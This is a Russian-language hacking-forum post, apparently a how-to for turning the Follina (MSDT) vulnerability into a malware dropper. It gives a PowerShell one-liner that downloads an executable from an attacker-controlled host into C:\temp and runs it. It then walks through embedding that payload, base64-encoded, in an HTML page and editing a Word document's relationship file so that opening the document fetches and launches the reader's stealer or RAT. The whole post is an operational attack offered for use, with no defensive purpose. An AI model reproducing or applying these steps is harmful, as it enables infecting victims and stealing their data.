Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили XakerPlus!

Follina - Macro-less attack - 0 Day

При запуски doc будет подгружаться exe,файлы которые нам понадобиться тыц
 ​
Заходим на хостинг , я беру бесплатный free.sprinthost.ru (не реклама).
 ​
Переходим в Файловый менеджер
 ​
dP1Hhqp.png
 ​
Загружаем 1.html (как его изменить расписано снизу) и ваш [tooltip=9]стиллер[/tooltip] или [tooltip=103]ратник[/tooltip]
 
klSEESe.png

 
Переходим на сайт base64encode.org и вводим.
Код:
Get-Process -Name msdt|Stop-Process;powershell -nop -c New-Item -Path "C:\" -Name "temp" -ItemType Directory
(New-Object System.Net.WebClient).DownloadFile("http://hosting/file.exe","C:\temp\file.exe")
Start-Process ("C:\temp\file.exe")
Вместо hosting нужно ввести ваш домен который мы создали выше , а вместо file.exe название вашего exe которого мы загрузили на хостинг .Потом всё это перекидываем на сайт , после нажимаем на encode и копируем что получилось.
 
bR2Dgjz.png
 ​
Разархивируем файлы которые скачали , открываем 1.html через текстовый редактор листаем в самый вниз и находим "********MMMMMMM"
 ​
9cxlYVm.png
 ​
Вместо "********MMMMMMM" вставляем что выдал base64encode.org , после сохраняем файл.
 ​
После того как наш хостинг и файл готов, открываем follina.doc через 7-ZIP и переходим в follina.doc\word\_rels\ и находим файл document.xml.rels ,нажимаем правой кнопкой, редактировать.
 ​
1.png
 ​
Вместо "ССЫЛКА НА САЙТ" вводим ссылку на хостинг и 1.html , должно получиться так http://hosting/1.html
 
2.png

 
Сохраняем , и получаем документ который при открытие будет подгружать ваш файл с хостинга и запускать его .
 
Если выходит данная картина , то всё работает корректно.
 
3.png

 
© copyright
 



 

 
 
Последнее редактирование:


Сверху